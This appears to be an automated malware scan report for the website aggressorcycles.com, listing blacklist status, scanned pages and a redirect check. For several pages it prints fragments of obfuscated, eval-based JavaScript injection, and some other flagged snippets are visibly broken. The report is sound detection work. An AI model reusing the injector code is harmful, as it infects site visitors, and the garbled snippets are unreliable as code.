Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aggressorcycles.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aggressorcycles.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.aggressorcycles.com/ | 200 OK Content-Length: 9360 Content-Type: text/html | clean |
http://www.aggressorcycles.com/TEST/military.html | 200 OK Content-Length: 11251 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c(59(6f(c5(b0(c1(6f(b2(be(bd(c3(c1(be Antivirus reports:
| ||
http://www.aggressorcycles.com/TEST/index.html | 200 OK Content-Length: 13881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c(59(6f(c5(b0(c1(6f(b2(be(bd(c3(c1(be Antivirus reports:
| ||
http://www.aggressorcycles.com/TEST/ | 200 OK Content-Length: 13881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c(59(6f(c5(b0(c1(6f(b2(be(bd(c3(c1(be Antivirus reports:
| ||
http://www.aggressorcycles.com/TEST/JANUARY.html | 200 OK Content-Length: 14820 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function MM_popupMsg(msg) { alert(msg); } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } Antivirus reports:
| ||
http://www.aggressorcycles.com/TEST/catalog/ | 200 OK Content-Length: 24911 Content-Type: text/html | clean |
http://www.aggressorcycles.com/TEST/catalog/ext/jquery/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/x-javascript | clean |
http://www.aggressorcycles.com/TEST/catalog/ext/jquery/ui/jquery-ui-1.8.6.min.js | 200 OK Content-Length: 205136 Content-Type: application/x-javascript | clean |
http://www.aggressorcycles.com/TEST/catalog/ext/jquery/bxGallery/jquery.bxGallery.1.1.min.js | 200 OK Content-Length: 4107 Content-Type: application/x-javascript | clean |
http://www.aggressorcycles.com/TEST/catalog/ext/jquery/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://www.aggressorcycles.com/TEST/catalog/ext/js/flashobject.js | 200 OK Content-Length: 5703 Content-Type: application/x-javascript | clean |
http://www.aggressorcycles.com/test404page.js | 404 Not Found Content-Length: 404 Content-Type: text/html | clean |
http://www.aggressorcycles.com/TEST/FEBRUARY.html | 200 OK Content-Length: 14438 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function MM_popupMsg(msg) { alert(msg); } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } Antivirus reports:
| ||
http://www.aggressorcycles.com/TEST/MARCH.html | 200 OK Content-Length: 14428 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function MM_popupMsg(msg) { alert(msg); } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } Antivirus reports:
| ||
http://www.aggressorcycles.com/TEST/APRIL.html | 200 OK Content-Length: 14428 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function MM_popupMsg(msg) { alert(msg); } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aggressorcycles.com
Result:
GET / HTTP/1.1
Host: aggressorcycles.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: aggressorcycles.com
Referer: http://www.google.com/search?q=aggressorcycles.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aggressorcycles.com
Referer: http://www.google.com/search?q=aggressorcycles.com
Result:
The result is similar to the first query. There are no suspicious redirects found.